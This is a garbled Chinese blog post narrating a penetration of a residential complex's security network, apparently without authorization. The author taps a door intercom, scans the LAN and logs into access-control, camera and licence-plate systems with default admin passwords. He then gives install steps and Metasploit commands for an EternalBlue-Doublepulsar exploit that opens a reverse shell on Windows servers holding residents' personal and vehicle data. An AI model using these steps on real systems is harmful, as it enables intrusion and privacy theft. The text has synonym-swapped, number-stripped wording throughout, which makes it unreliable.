过程很漫长，想看就耐点心，此外这不是破解的哈前言博主从小就是一个快乐喜爱把工作简单化的汉子，可是现实老是在不经意间给你太多的欣喜，好比不竭的搬场。博主所购的小区对自己的智能化系统鼓吹的很到位，所以闲下来的时辰博主我就对小区的安防系统进行一次简单的渗入，轻松拿下各类安防系统，这篇文章就来具体的声名一下。预备最早之前，博主需要对气象进行一个简单的描述，以便巨匠能够在脑海中脑补一下全数渗入测试的过程，算是博主在线下渗入的一个例子吧，往后还有对全数商场各类店肆各类的渗入过程，城市一一教学。好了，废话就不多说了，我们既然是对汇集系统进行渗入测试，自然是得有一个进口，那这个进口在哪找呢巨匠都知道，一般小区这类内部的汇集都是不直接毗连到外网的，假定连那也是做了隔离，孤立有一个跳板来做，这样相对斗劲安然，可是正常气象都是没外网的，这类局域网系统有两个凸起的特点。点就是呵护人员过度的相信了内网的机械，认为只要不毗连外网就根底上没事，高枕无忧，真是图样图森破。第二点就是没有安然防护软件，就算有，那也是病毒特点库千百年不会更新，跟放置一样，没有外网更新个毛线，这一点后面有机械可以验证。所以具有这两个特点的内部局域网长短常懦弱的，只要找到一个进口，根底上全数汇集就game over了，这个进口就很是的好找了。尽人皆知，此刻的小区都是家家户户安装了一个可视对讲机，这玩意有时辰挺好用，好比有客人来了，楼下除夜门门禁可以用这玩意远程开门，可以语音对讲，可以看到对方的脸，还可以录音录相，不单如斯，还能跟家里的烟雾报警器连起来，发生火灾直接通知物业并发出警报，还可以呼叫招呼其他住户来一个的局域网语音聊天，功能可以说是相当丰硕了。你猜的没错，我们全数渗入测试过程就从这个设备最早，先来看看我们这个短长的可视对讲机长甚么样经由过程缺省弱口令进入工程模式，拿到ip，还有处事器拆下对讲机我擦嘞，这网线也太短了吧，上工具把网线进行延迟便当接交流机、路由器、笔记本之类的设备，确认下通信是不是切确根底预备工作弄定往后就最前进前辈行入侵渗入了扫描遵循之前撸光猫内网的经验，这里的IP必然是固定的，而且跟住户号是绑定的，假定操作自己的iP进行测试，万一出啥问题那不长短常的尴尬，既然此刻良多业主都还没有入住，那么IP池也有良多的余暇，就操作其他住户的IP吧，只要不冲突就行，说干就干，上设备：一个充电宝、一个路由器、一台笔记本通电后设置路由器的固定IP这样笔记本经由过程无线wifi便可以对IP段进行扫描了，我这操作的扫描软件是Angry IP Scanner，图形界面用起来很爽，而且速度也快对...进行扫描发现存活主机个，为了对IP快速分类，将存活的IP全数导出，编写python剧本对ip的http响应头进行分类，事实下场分为下面的这几类：类mini_httpd. dec这一类机械是所有的门禁机，包含了住户家里的对讲机，楼栋除夜堂的门禁机，电梯的门禁机，小区除夜门的门禁机，经由过程ip和admin 弱口令可以远程节制，同时telnet也能够毗连，治理页面功能很全，搜罗改削密码，节制开门时刻，节制门禁奥秘码，呼叫招呼住户，呼叫招呼物业中心，恢复出厂设置等等，功能丰硕，界面以下第二类DNVRS-WebsHikvision-webs App-webs 这三种都是海康威视的监控探头，登录界面有以下几种只有中心那种可以无限次输错密码进行爆破，其他两种都是输错五次就锁定第三类Net Keybord-Webs这是一个汇集键盘，凡是用于操作监控的云台动弹，好比球机的操作杆，登录界面密码输错次就锁定。第四类Boa..这个就成心思了，这是车牌识别系统，车辆入库的时辰进行车牌识别，摄影存储的机械，也是全数admin admin弱口令直接登录，里面存储了些啥就不多说了，放两张图巨匠随便感应传染下经由过程对这几种设备的归类扫描，事实下场必定了几台windows处事器...............操作Nmap扫描功能以下 Nmap . scan initiated Fri May :: as: nmap -iL something_ip.txt -oN scaned.txt -T openNmap scan report for ...Host is up (.s latency).Not shown: closed portsPORT STATE SERVICEtcp open msrpctcp open netbios-ssntcp open microsoft-dstcp open ms-sql-stcp open ms-olaptcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknownNmap scan report for ...Host is up (.s latency).Not shown: closed portsPORT STATE SERVICEtcp open msrpctcp open netbios-ssntcp open microsoft-dstcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknownNmap scan report for ...Host is up (.s latency).Not shown: closed portsPORT STATE SERVICEtcp open msrpctcp open netbios-ssntcp open microsoft-dstcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknownNmap scan report for ...Host is up (.s latency).Not shown: closed portsPORT STATE SERVICEtcp open msrpctcp open netbios-ssntcp open microsoft-dstcp open ms-wbt-servertcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknowntcp open unknown Nmap done at Fri May :: IP addresses ( hosts up) scanned in . seconds很较着，四台机械都开了端口，其中 ... 开了端口，较着是sql server数据库，...还开了，这台机械是在门禁机里面见过，是门禁系统的处事器。下面就重点对这几台机械入手，操作msf扫描下看是不是是都存在b裂痕（ms_），这裂痕在局域网真的超级好用，扫描截图发现只有... 不存在ms_，其他三台都存在，操作系统分袂是... win sp x... win sp x... win sp x此刻方针就很是了了了，可是有个问题，msf自带的操作模块只针对x版本的操作系统，对x版本的系统只能操作其他工具，emmmmm….一阵思虑往后，博主抉择先弄定那台位win，为了能够正常的反弹shell回来，我把路由器改成桥接模式，本电机脑设置固定IP，这样我的机械就跟方针机械处于不异汇集拓扑，反弹自然无压力so…msf的用法我这里就不多说了，假定真不知道，可以…给出一张run vnc的截图，拿下监控系统有趣的是这台机械上竟然安装了安然卫士…寄望看上面一张图的阿谁监控室，治理员面前有三台机械，所以此外两台我下一步就要弄定。上面说位win已拿下，此刻弄定位机械，操作 htt:github.comElevenPathsEternalblue-Doublepulsar-Metasploit 这里的Ruby剧本便可，需要寄望的是假定本机是kali 位的需要安装 wine，安装编制是dpkg add-architecture i apt-get update apt-get install wine而且全程操作需要在root下面，安装完wine后履行一下 wine cmd.exe 这样会自动在root下面建树.wine目录，这个目录msf会用到操作git clone htt:github.comElevenPathsEternalblue-Doublepulsar-Metasploit.git将剧本克隆到当地，然后把目录下的de 目录和rb文件到msf的modules路径下，这样既可操作了（PS：我这里只了rb剧本，de没有畴昔所以呼吁不太一样），具体呼吁以下msf use exploitwindowsbeternalblue_doublepulsarmsf exploit(windowsbeternalblue_doublepulsar) set ETERNALBLUEPATH homepoweroffGithubEternalblue-Doublepulsar-MetasploitdeETERNALBLUEPATH = homepoweroffGithubEternalblue-Doublepulsar-Metasploitdemsf exploit(windowsbeternalblue_doublepulsar) set DOUBLEPULSARPATH homepoweroffGithubEternalblue-Doublepulsar-MetasploitdeDOUBLEPULSARPATH = homepoweroffGithubEternalblue-Doublepulsar-Metasploitdemsf exploit(windowsbeternalblue_doublepulsar) set TARGETARCHITECTURE xTARGETARCHITECTURE = xmsf exploit(windowsbeternalblue_doublepulsar) set PROCESSINJECT wlms.exePROCESSINJECT = wlms.exemsf exploit(windowsbeternalblue_doublepulsar) show targetsExploit targets: Id Name Windows XP (all services pack) (x) (x) Windows Server SP (x) Windows Server SPSP (x) Windows Server (x) Windows Vista (x) Windows Vista (x) Windows Server (x) Windows Server R (x) (x) Windows (all services pack) (x) (x)msf exploit(windowsbeternalblue_doublepulsar) set target target = msf exploit(windowsbeternalblue_doublepulsar) set rhostset rhost msf exploit(windowsbeternalblue_doublepulsar) set rhost ...rhost = ...msf exploit(windowsbeternalblue_doublepulsar) set lhost ...lhost = ...msf exploit(windowsbeternalblue_doublepulsar) exploit不出意外的话报复抨击袭击就成功了，给出报复抨击袭击成功的截图。个是门禁系统，没装杀毒软件，就只有一些门禁卡治理软件第二个系统是车辆治理系统，车辆收支库时辰用的总结好了，至此，对小区的安防系统进行了简单的渗入测试，成功拿下关头系统，其中在处事器中还发现了除夜量的敏感文件，搜罗业主的小我信息，车辆信息，车辆收支挂号信息等等，难怪说各类骚扰，这简直要分分钟泄露。后记安然是一个整体，千里之堤溃于蚁穴，下一次把门禁卡的破解还有自动节制升降杠的综合在一路再写一篇